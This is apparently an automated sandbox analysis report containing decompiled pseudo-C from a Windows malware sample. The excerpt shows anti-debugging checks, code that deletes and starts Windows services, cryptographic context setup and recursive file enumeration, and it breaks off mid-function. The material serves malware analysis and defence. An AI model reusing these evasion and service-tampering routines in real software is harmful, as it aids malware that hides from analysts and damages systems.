                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$InformationTimeZone
                          • String ID:
                          • API String ID: 597776487-0
                          • Opcode ID: 7cc1dd148a2f1a7090d41fe1e52a40b003909d2cdb57bd5dd648ba244d23056c
                          • Instruction ID: 51e1fdcef56e80ceeac92a9e386514531a34632659248990e3edd98ae7be4062
                          • Opcode Fuzzy Hash: 7cc1dd148a2f1a7090d41fe1e52a40b003909d2cdb57bd5dd648ba244d23056c
                          • Instruction Fuzzy Hash: E1A12BB2900216ABEB60AF6DDC45E6EBFBDEF50B1CF944169ED05A7244E7309A40C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0135EBE5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, signed short _a4, short* _a8, short* _a12) {
                          				signed int _v8;
                          				int _v12;
                          				int _v16;
                          				char _v20;
                          				signed short* _v24;
                          				short* _v28;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t39;
                          				void* _t45;
                          				signed short* _t46;
                          				signed short _t47;
                          				short* _t48;
                          				int _t49;
                          				short* _t55;
                          				short* _t56;
                          				short* _t57;
                          				int _t65;
                          				int _t67;
                          				short* _t71;
                          				intOrPtr _t74;
                          				void* _t76;
                          				short* _t77;
                          				intOrPtr _t84;
                          				short* _t88;
                          				short* _t91;
                          				short** _t102;
                          				short* _t103;
                          				signed short _t104;
                          				signed int _t107;
                          				void* _t108;
                          
                          				_t39 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t39 ^ _t107;
                          				_t88 = _a12;
                          				_t104 = _a4;
                          				_v28 = _a8;
                          				_v24 = E013559E0(__ecx, __edx) + 0x50;
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				_t45 = E013559E0(__ecx, __edx);
                          				_t99 = 0;
                          				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                          				_t91 = _t104 + 0x80;
                          				_t46 = _v24;
                          				 *_t46 = _t104;
                          				_t102 =  &(_t46[2]);
                          				 *_t102 = _t91;
                          				if(_t91 != 0 &&  *_t91 != 0) {
                          					_t84 =  *0x137d664; // 0x17
                          					E0135EB84(_t91, 0, 0x137d550, _t84 - 1, _t102);
                          					_t46 = _v24;
                          					_t108 = _t108 + 0xc;
                          					_t99 = 0;
                          				}
                          				_v20 = _t99;
                          				_t47 =  *_t46;
                          				if(_t47 == 0 ||  *_t47 == _t99) {
                          					_t48 =  *_t102;
                          					__eflags = _t48;
                          					if(_t48 == 0) {
                          						L19:
                          						_v20 = 0x104;
                          						_t49 = GetUserDefaultLCID();
                          						_v12 = _t49;
                          						_v16 = _t49;
                          						goto L20;
                          					}
                          					__eflags =  *_t48 - _t99;
                          					if(__eflags == 0) {
                          						goto L19;
                          					}
                          					E0135E526(_t91, _t99, __eflags,  &_v20);
                          					_pop(_t91);
                          					goto L20;
                          				} else {
                          					_t71 =  *_t102;
                          					if(_t71 == 0) {
                          						L8:
                          						E0135E60C(_t91, _t99, __eflags,  &_v20);
                          						L9:
                          						_pop(_t91);
                          						if(_v20 != 0) {
                          							_t103 = 0;
                          							__eflags = 0;
                          							L25:
                          							asm("sbb esi, esi");
                          							_t104 = E0135EA10(_t91,  ~_t104 & _t104 + 0x00000100,  &_v20);
                          							__eflags = _t104;
                          							if(_t104 == 0) {
                          								L22:
                          								L23:
                          								return E0132EA79(_v8 ^ _t107, _t104);
                          							}
                          							_t55 = IsValidCodePage(_t104 & 0x0000ffff);
                          							__eflags = _t55;
                          							if(_t55 == 0) {
                          								goto L22;
                          							}
                          							_t56 = IsValidLocale(_v16, 1);
                          							__eflags = _t56;
                          							if(_t56 == 0) {
                          								goto L22;
                          							}
                          							_t57 = _v28;
                          							__eflags = _t57;
                          							if(_t57 != 0) {
                          								 *_t57 = _t104;
                          							}
                          							E013563D2(_v16,  &(_v24[0x128]), 0x55, _t103);
                          							__eflags = _t88;
                          							if(_t88 == 0) {
                          								L34:
                          								goto L23;
                          							}
                          							_t33 =  &(_t88[0x90]); // 0xd0
                          							E013563D2(_v16, _t33, 0x55, _t103);
                          							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
                          							__eflags = _t65;
                          							if(_t65 == 0) {
                          								goto L22;
                          							}
                          							_t36 =  &(_t88[0x40]); // 0x30
                          							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                          							__eflags = _t67;
                          							if(_t67 == 0) {
                          								goto L22;
                          							}
                          							_t38 =  &(_t88[0x80]); // 0xb0
                          							E01363434(_t38, _t104, _t38, 0x10, 0xa);
                          							goto L34;
                          						}
                          						_t74 =  *0x137d54c; // 0x41
                          						_t76 = E0135EB84(_t91, _t99, 0x137d240, _t74 - 1, _v24);
                          						_t108 = _t108 + 0xc;
                          						if(_t76 == 0) {
                          							L20:
                          							_t103 = 0;
                          							__eflags = 0;
                          							L21:
                          							if(_v20 != 0) {
                          								goto L25;
                          							}
                          							goto L22;
                          						}
                          						_t77 =  *_t102;
                          						_t103 = 0;
                          						if(_t77 == 0) {
                          							L14:
                          							E0135E60C(_t91, _t99, __eflags,  &_v20);
                          							L15:
                          							_pop(_t91);
                          							goto L21;
                          						}
                          						_t121 =  *_t77;
                          						if( *_t77 == 0) {
                          							goto L14;
                          						}
                          						E0135E571(_t91, _t99, _t121,  &_v20);
                          						goto L15;
                          					}
                          					_t117 =  *_t71 - _t99;
                          					if( *_t71 == _t99) {
                          						goto L8;
                          					}
                          					E0135E571(_t91, _t99, _t117,  &_v20);
                          					goto L9;
                          				}
                          			}

                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                            • Part of subcall function 013559E0: _free.LIBCMT ref: 01355A42
                            • Part of subcall function 013559E0: _free.LIBCMT ref: 01355A78
                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0135ECF1
                          • IsValidCodePage.KERNEL32(00000000), ref: 0135ED3A
                          • IsValidLocale.KERNEL32(?,00000001), ref: 0135ED49
                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0135ED91
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0135EDB0
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                          • String ID:
                          • API String ID: 949163717-0
                          • Opcode ID: e732c0e9c9d7899aa27a64b63efa70ec805d94dcc453fd8493372b93f36225a7
                          • Instruction ID: 4a890035d3f812f9bdd33366a011487c8c13e894b39a90d585fa28cbbb2ee688
                          • Opcode Fuzzy Hash: e732c0e9c9d7899aa27a64b63efa70ec805d94dcc453fd8493372b93f36225a7
                          • Instruction Fuzzy Hash: 94517E71A0021AAFEF60DFADDC44EAAB7B8EF14B49F054439EE15E7140E770DA008B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E012FA100(void* __edi, void* __esi) {
                          				signed int _v8;
                          				char _v12;
                          				struct _CONTEXT _v728;
                          				signed int _t14;
                          				void* _t20;
                          				void* _t33;
                          				signed int _t34;
                          
                          				_t33 = __esi;
                          				_t14 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t14 ^ _t34;
                          				if(IsDebuggerPresent() != 0) {
                          					L9:
                          					return E0132EA79(_v8 ^ _t34, _t33);
                          				} else {
                          					_v12 = 1;
                          					_t20 = GetCurrentProcess();
                          					__imp__CheckRemoteDebuggerPresent(_t20,  &_v12);
                          					if(_t20 == 0 || _v12 != 0) {
                          						goto L9;
                          					} else {
                          						E013478D0(__edi,  &(_v728.Dr0), 0, 0x2c8);
                          						_v728.ContextFlags = 0x10010;
                          						if(GetThreadContext(GetCurrentThread(),  &_v728) == 0 || _v728.Dr0 == 0 && _v728.Dr1 == 0 && _v728.Dr2 == 0 && _v728.Dr3 == 0) {
                          							return E0132EA79(_v8 ^ _t34, _t33);
                          						} else {
                          							goto L9;
                          						}
                          					}
                          				}
                          			}











                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 012FA113
                          • GetCurrentProcess.KERNEL32(?), ref: 012FA12C
                          • CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 012FA133
                          • GetCurrentThread.KERNEL32 ref: 012FA16A
                          • GetThreadContext.KERNEL32(00000000), ref: 012FA171
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CurrentDebuggerPresentThread$CheckContextProcessRemote
                          • String ID:
                          • API String ID: 3297751945-0
                          • Opcode ID: 4289a7b539ae1cee74611e1c40be7fde6602be401df48904a7676ec5fa0cecc5
                          • Instruction ID: 1f0c417b8262da4380a373fa99e090e9bec4f4de8f69dfe8e6f1b169b436b151
                          • Opcode Fuzzy Hash: 4289a7b539ae1cee74611e1c40be7fde6602be401df48904a7676ec5fa0cecc5
                          • Instruction Fuzzy Hash: 3B110D30A1121DDFEF30EFA4E84D79EB7B8BB14355F0140AAD60AA3141EB749A84DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E012FBE70(short* _a4) {
                          				signed int _t13;
                          				void* _t15;
                          				short* _t17;
                          				void* _t18;
                          
                          				_t17 = _a4;
                          				_t13 = 0;
                          				if(_t17[8] == 0) {
                          					return 0;
                          				} else {
                          					_t15 = OpenSCManagerW(0, 0, 0xf003f);
                          					if(_t15 != 0) {
                          						if(_t17[0xa] >= 8) {
                          							_t17 =  *_t17;
                          						}
                          						_t18 = OpenServiceW(_t15, _t17, 0x10020);
                          						if(_t18 != 0) {
                          							_t13 = _t13 & 0xffffff00 | DeleteService(_t18) != 0x00000000;
                          							CloseServiceHandle(_t18);
                          						}
                          						CloseServiceHandle(_t15);
                          					}
                          					return _t13;
                          				}
                          			}








                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 012FBE8A
                          • OpenServiceW.ADVAPI32(00000000,?,00010020), ref: 012FBEA5
                          • DeleteService.ADVAPI32(00000000), ref: 012FBEB2
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 012FBEBE
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 012FBEC5
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Service$CloseHandleOpen$DeleteManager
                          • String ID:
                          • API String ID: 204194956-0
                          • Opcode ID: 947d0a6b5392603d7bf22e4a17163cc9a67b990c0d256c0da8c7b45a9d4b76c0
                          • Instruction ID: 536c913e23d690921e4c7e27408abc738214db588c338d29f8c8e45ae0a78ef9
                          • Opcode Fuzzy Hash: 947d0a6b5392603d7bf22e4a17163cc9a67b990c0d256c0da8c7b45a9d4b76c0
                          • Instruction Fuzzy Hash: EDF0FC36191225ABD3320E1CFC09BABFBACEF4A721F09012AFB4057144C774A848D7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E01309A90(void* __eax, void* __ecx) {
                          				signed int _t7;
                          				void* _t11;
                          
                          				_t11 = __ecx + 0x5c;
                          				if( *((intOrPtr*)(__ecx + 0x5c)) != 0) {
                          					L5:
                          					return 1;
                          				} else {
                          					__imp__CryptAcquireContextW(_t11, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
                          					if(__eax != 0) {
                          						goto L5;
                          					} else {
                          						_t7 = GetLastError();
                          						if(_t7 != 0x80090016) {
                          							return 0;
                          						} else {
                          							__imp__CryptAcquireContextW(_t11, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                          							return _t7 & 0xffffff00 | _t7 != 0x00000000;
                          						}
                          					}
                          				}
                          			}






                          APIs
                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 01309AA9
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01308B84), ref: 01309AB3
                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01309ACC
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AcquireContextCrypt$ErrorLast
                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                          • API String ID: 2779411412-1948191093
                          • Opcode ID: b22a2d4f419bcb33b924bd7ec0f8c55d4ffc73fe9721c18770f2c528bf54a73a
                          • Instruction ID: a303f657f5ff7c8250be021b10cf663b649f0953c63507c052f1dd5f6239b368
                          • Opcode Fuzzy Hash: b22a2d4f419bcb33b924bd7ec0f8c55d4ffc73fe9721c18770f2c528bf54a73a
                          • Instruction Fuzzy Hash: 2DE0D8312C2310B6FF73AA257C46FCE23889F41B2DF224048F109B84C6C39865C7A795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E012FBE00(short* _a4) {
                          				void* _t9;
                          				signed int _t12;
                          				void* _t14;
                          				short* _t16;
                          
                          				_t16 = _a4;
                          				_t12 = 0;
                          				if(_t16[8] == 0) {
                          					return 0;
                          				} else {
                          					_t14 = OpenSCManagerW(0, 0, 0xf003f);
                          					if(_t14 != 0) {
                          						if(_t16[0xa] >= 8) {
                          							_t16 =  *_t16;
                          						}
                          						_t9 = OpenServiceW(_t14, _t16, 0x10);
                          						if(_t9 != 0) {
                          							_t12 = _t12 & 0xffffff00 | StartServiceW(_t9, 0, 0) != 0x00000000;
                          						}
                          						CloseServiceHandle(_t14);
                          					}
                          					return _t12;
                          				}
                          			}








                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 012FBE1A
                          • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 012FBE32
                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 012FBE41
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 012FBE4D
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Service$Open$CloseHandleManagerStart
                          • String ID:
                          • API String ID: 2553746010-0
                          • Opcode ID: d50fab6d57882c4c5f76b155198057a8beaa6afb3c30653d0f704e4618f944f0
                          • Instruction ID: cfd99f3385c8ad9c813b4ade45662d00d4eee82c1253bb845dcdbee8b0701389
                          • Opcode Fuzzy Hash: d50fab6d57882c4c5f76b155198057a8beaa6afb3c30653d0f704e4618f944f0
                          • Instruction Fuzzy Hash: 27F096362D1315ABE6311E29FC09FA7FBACEB85B21F14412AF74097280C7B1A454D674
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E0130D280(intOrPtr __ecx, intOrPtr _a4, void* _a8, signed int _a44, char _a48) {
                          				char _v8;
                          				signed int _v16;
                          				signed int _v20;
                          				struct _WIN32_FIND_DATAW _v612;
                          				void* _v616;
                          				intOrPtr _v620;
                          				signed int _v624;
                          				intOrPtr _v628;
                          				short _v644;
                          				intOrPtr _v648;
                          				signed int _v652;
                          				signed int _v656;
                          				char _v676;
                          				signed int _v680;
                          				signed int _v684;
                          				short _v700;
                          				intOrPtr* _v712;
                          				signed int _v724;
                          				signed int _v728;
                          				signed int _v748;
                          				signed int _v752;
                          				char _v768;
                          				char _v772;
                          				signed int _v780;
                          				short _v784;
                          				char _v800;
                          				intOrPtr _v804;
                          				signed int _v808;
                          				intOrPtr* _v812;
                          				signed int _v824;
                          				intOrPtr _v828;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t167;
                          				signed int _t168;
                          				WCHAR* _t177;
                          				void* _t178;
                          				signed int _t179;
                          				signed int _t180;
                          				signed int _t184;
                          				signed int _t185;
                          				long _t186;
                          				void* _t187;
                          				void* _t188;
                          				signed int _t190;
                          				signed int _t197;
                          				signed int _t198;
                          				signed int _t201;
                          				intOrPtr _t202;
                          				signed int _t206;
                          				void* _t207;
                          				signed int _t208;
                          				signed int _t209;
                          				signed int _t210;
                          				signed int _t212;
                          				intOrPtr* _t214;
                          				void* _t215;
                          				intOrPtr* _t217;
                          				void* _t218;
                          				void* _t219;
                          				intOrPtr* _t220;
                          				signed int _t224;
                          				signed int _t226;
                          				void* _t231;
                          				signed int _t234;
                          				signed int _t236;
                          				void* _t243;
                          				void* _t244;
                          				signed int _t246;
                          				intOrPtr _t252;
                          				intOrPtr _t255;
                          				intOrPtr _t256;
                          				void* _t258;
                          				intOrPtr* _t260;
                          				signed int _t267;
                          				char* _t269;
                          				intOrPtr* _t270;
                          				signed int _t274;
                          				intOrPtr* _t277;
                          				signed int _t278;
                          				signed int _t282;
                          				signed int _t283;
                          				signed int _t284;
                          				intOrPtr _t288;
                          				intOrPtr* _t291;
                          				intOrPtr* _t292;
                          				signed int _t296;
                          				signed int _t302;
                          				void* _t307;
                          				intOrPtr _t308;
                          				intOrPtr _t309;
                          				signed int _t311;
                          				signed int _t312;
                          				void* _t315;
                          				intOrPtr _t320;
                          				intOrPtr _t321;
                          				intOrPtr _t323;
                          				intOrPtr* _t325;
                          				intOrPtr* _t328;
                          				intOrPtr _t331;
                          				void* _t333;
                          				void* _t334;
                          				signed int _t335;
                          				void* _t336;
                          				signed int _t337;
                          				signed int _t338;
                          				void* _t340;
                          				intOrPtr* _t342;
                          				intOrPtr* _t343;
                          				signed int _t345;
                          				signed int _t346;
                          				signed int _t347;
                          				void* _t349;
                          				void* _t350;
                          				signed int _t351;
                          				signed int _t353;
                          
                          				_push(0xffffffff);
                          				_push(0x136741f);
                          				_push( *[fs:0x0]);
                          				_t350 = _t349 - 0x2ac;
                          				_t167 =  *0x13a4018; // 0x39cca9f6
                          				_t168 = _t167 ^ _t346;
                          				_v20 = _t168;
                          				_push(_t168);
                          				 *[fs:0x0] =  &_v16;
                          				_t323 = __ecx;
                          				_v648 = __ecx;
                          				_t252 = _a4;
                          				_v620 = _t252;
                          				_v8 = 0;
                          				if( *((intOrPtr*)(_t252 + 0x10)) == 0) {
                          					L42:
                          					_t260 = _a44;
                          					if(_t260 != 0) {
                          						 *((intOrPtr*)( *_t260 + 0x10))(( &_a8 & 0xffffff00 | _t260 !=  &_a8) & 0x000000ff);
                          					}
                          					goto L44;
                          				} else {
                          					if(_a44 == 0) {
                          						L44:
                          						 *[fs:0x0] = _v16;
                          						_pop(_t333);
                          						return E0132EA79(_v20 ^ _t346, _t333);
                          					} else {
                          						E013478D0(__ecx,  &_v612, 0, 0x250);
                          						_push(0x1396bbc);
                          						_t177 = E012FC400(_t252,  &_v700, _t252, _t323);
                          						_t351 = _t350 + 0x10;
                          						if(_t177[0xa] >= 8) {
                          							_t177 =  *_t177;
                          						}
                          						_t178 = FindFirstFileW(_t177,  &_v612);
                          						_t267 = _v680;
                          						_v616 = _t178;
                          						if(_t267 >= 8) {
                          							_push(2 + _t267 * 2);
                          							E012F56A0(_t252, _t323, _v700);
                          							_t178 = _v616;
                          							_t351 = _t351 + 8;
                          						}
                          						_v684 = 0;
                          						_v680 = 7;
                          						_v700 = 0;
                          						if(_t178 != 0xffffffff) {
                          							_t334 = _v616;
                          							do {
                          								_t269 = ".";
                          								_t179 =  &(_v612.cFileName);
                          								while(1) {
                          									_t307 =  *_t179;
                          									if(_t307 !=  *_t269) {
                          										break;
                          									}
                          									if(_t307 == 0) {
                          										L13:
                          										_t180 = 0;
                          									} else {
                          										_t321 =  *((intOrPtr*)(_t179 + 2));
                          										if(_t321 != _t269[2]) {
                          											break;
                          										} else {
                          											_t179 = _t179 + 4;
                          											_t269 =  &(_t269[4]);
                          											if(_t321 != 0) {
                          												continue;
                          											} else {
                          												goto L13;
                          											}
                          										}
                          									}
                          									L15:
                          									if(_t180 == 0) {
                          										goto L40;
                          									} else {
                          										_t184 = 0x1396bc4;
                          										_t270 =  &(_v612.cFileName);
                          										while(1) {
                          											_t308 =  *_t270;
                          											if(_t308 !=  *_t184) {
                          												break;
                          											}
                          											if(_t308 == 0) {
                          												L21:
                          												_t185 = 0;
                          											} else {
                          												_t320 =  *((intOrPtr*)(_t270 + 2));
                          												if(_t320 !=  *((intOrPtr*)(_t184 + 2))) {
                          													break;
                          												} else {
                          													_t270 = _t270 + 4;
                          													_t184 = _t184 + 4;
                          													if(_t320 != 0) {
                          														continue;
                          													} else {
                          														goto L21;
                          													}
                          												}
                          											}
                          											L23:
                          											if(_t185 == 0) {
                          												goto L40;
                          											} else {
                          												_t186 = _v612.dwFileAttributes;
                          												if((_t186 & 0x00000004) != 0) {
                          													goto L40;
                          												} else {
                          													if(_a48 != 0) {
                          														L32:
                          														_t309 = _t252;
                          														_push("\\");
                          														if((_t186 & 0x00000010) == 0) {
                          															_t187 = E012FC400(_t252,  &_v676, _t309, _t323);
                          															_v8 = 5;
                          															_t188 = E012F8470( &_v644, _t187,  &(_v612.cFileName));
                          															_t351 = _t351 + 8;
                          															_v8 = 6;
                          															_t274 = _a44;
                          															__eflags = _t274;
                          															if(__eflags == 0) {
                          																E01316BEC(__eflags);
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																asm("int3");
                          																_push(_t346);
                          																_t347 = _t351;
                          																_t353 = (_t351 & 0xfffffff0) - 0x58;
                          																_t190 =  *0x13a4018; // 0x39cca9f6
                          																_v724 = _t190 ^ _t353;
                          																_push(_t334);
                          																_push(_t323);
                          																_t325 = _v712;
                          																_t335 = _t274;
                          																_v808 = _t335;
                          																_t311 =  *(_t325 + 0x10);
                          																__eflags = _t311;
                          																if(_t311 == 0) {
                          																	L87:
                          																	_pop(_t336);
                          																	__eflags = _v724 ^ _t353;
                          																	return E0132EA79(_v724 ^ _t353, _t336);
                          																} else {
                          																	__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 8;
                          																	_t277 = _t325;
                          																	if( *((intOrPtr*)(_t325 + 0x14)) >= 8) {
                          																		_t277 =  *_t325;
                          																	}
                          																	_push(_v804);
                          																	_t278 = E012F86C0(_t252, _t277, _t311, _t325, _t277, ".", 1);
                          																	_t353 = _t353 + 0x10;
                          																	__eflags = _t278 - 0xffffffff;
                          																	if(_t278 == 0xffffffff) {
                          																		_push(0);
                          																		_v752 = 0;
                          																		_v748 = 7;
                          																		_v768 = 0;
                          																		E012F51B0(_t252,  &_v768, _t325, _t335, 0x13836c0);
                          																		goto L60;
                          																	} else {
                          																		_v784 = 0;
                          																		_v800 = 0;
                          																		_t210 =  *(_t325 + 0x10);
                          																		_v780 = 7;
                          																		__eflags = _t210 - _t278;
                          																		if(_t210 < _t278) {
                          																			E012F8000(_t252, _t278, _t311, _t325);
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			asm("int3");
                          																			_push(_t347);
                          																			_push(_t278);
                          																			_push(_t252);
                          																			_push(_t335);
                          																			_push(_t325);
                          																			_t328 = _v812;
                          																			_t212 = _t278;
                          																			_v824 = _t212;
                          																			_t313 =  *(_t328 + 0x10);
                          																			__eflags =  *(_t328 + 0x10);
                          																			if( *(_t328 + 0x10) == 0) {
                          																				L106:
                          																				__eflags = 0;
                          																				return 0;
                          																			} else {
                          																				_t342 =  *((intOrPtr*)(_t212 + 0x30));
                          																				_t255 =  *((intOrPtr*)(_t212 + 0x34));
                          																				__eflags = _t342 - _t255;
                          																				if(_t342 == _t255) {
                          																					L98:
                          																					_t343 =  *((intOrPtr*)(_t212 + 0x24));
                          																					_t256 =  *((intOrPtr*)(_t212 + 0x28));
                          																					__eflags = _t343 - _t256;
                          																					if(_t343 == _t256) {
                          																						goto L106;
                          																					} else {
                          																						while(1) {
                          																							__eflags =  *((intOrPtr*)(_t343 + 0x14)) - 8;
                          																							_t214 = _t343;
                          																							if( *((intOrPtr*)(_t343 + 0x14)) >= 8) {
                          																								_t214 =  *_t343;
                          																							}
                          																							__eflags =  *((intOrPtr*)(_t328 + 0x14)) - 8;
                          																							_t291 = _t328;
                          																							if( *((intOrPtr*)(_t328 + 0x14)) >= 8) {
                          																								_t291 =  *_t328;
                          																							}
                          																							_t215 = E012F8820(_t291, _t313, 0, _t214,  *((intOrPtr*)(_t343 + 0x10)));
                          																							_t353 = _t353 + 0xc;
                          																							__eflags = _t215 - 0xffffffff;
                          																							if(_t215 != 0xffffffff) {
                          																								break;
                          																							}
                          																							_t313 =  *(_t328 + 0x10);
                          																							_t343 = _t343 + 0x18;
                          																							__eflags = _t343 - _t256;
                          																							if(_t343 != _t256) {
                          																								continue;
                          																							} else {
                          																								goto L106;
                          																							}
                          																							goto L108;
                          																						}
                          																						return 1;
                          																					}
                          																				} else {
                          																					while(1) {
                          																						__eflags =  *((intOrPtr*)(_t342 + 0x14)) - 8;
                          																						_t217 = _t342;
                          																						if( *((intOrPtr*)(_t342 + 0x14)) >= 8) {
                          																							_t217 =  *_t342;
                          																						}
                          																						__eflags =  *((intOrPtr*)(_t328 + 0x14)) - 8;
